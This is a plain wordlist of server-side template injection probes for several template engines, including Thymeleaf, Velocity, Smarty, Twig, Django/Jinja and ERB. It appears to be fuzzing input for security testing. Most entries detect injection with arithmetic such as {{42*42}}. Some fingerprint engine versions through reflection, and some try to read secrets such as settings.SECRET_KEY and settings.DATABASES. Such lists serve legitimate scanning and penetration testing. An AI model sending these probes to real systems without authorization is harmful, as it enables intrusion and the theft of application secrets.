#execInfo
#execInfo.templateStack
#execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
#{42*42}
$context.TOOLS_VERSION
$context.keys
$field.in("org.apache.velocity.runtime.RuntimeConstants")
$field.in("org.apache.velocity.runtime.VelocityEngineVersion")
$smarty.config
$smarty.template
$smarty.version
${42*42}
${donotexists|42*42}
.current_template_name
.locale_object
.version
42*42
<%=42*42 %>
ERB.version()
[[${42*42}]]
_context
_context|keys|first
_context|length
_self
_self.getTemplateName().__toString
constant('Twig_Environment::EXTRA_VERSION')
constant('Twig_Environment::VERSION')
constant('Twig_Environment::VERSION_ID')
execInfo
execInfo.templateStack
execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
global
globals()
locals
locals()
self
self._TemplateReference__context
settings
settings.DATABASES
settings.DEBUG
settings.SECRET_KEY
{42*'42'}
{42*42}
{^xyzm42}1764{/xyzm42}
{{42*42}}
{{=42*42}}
{{{42*42}}}
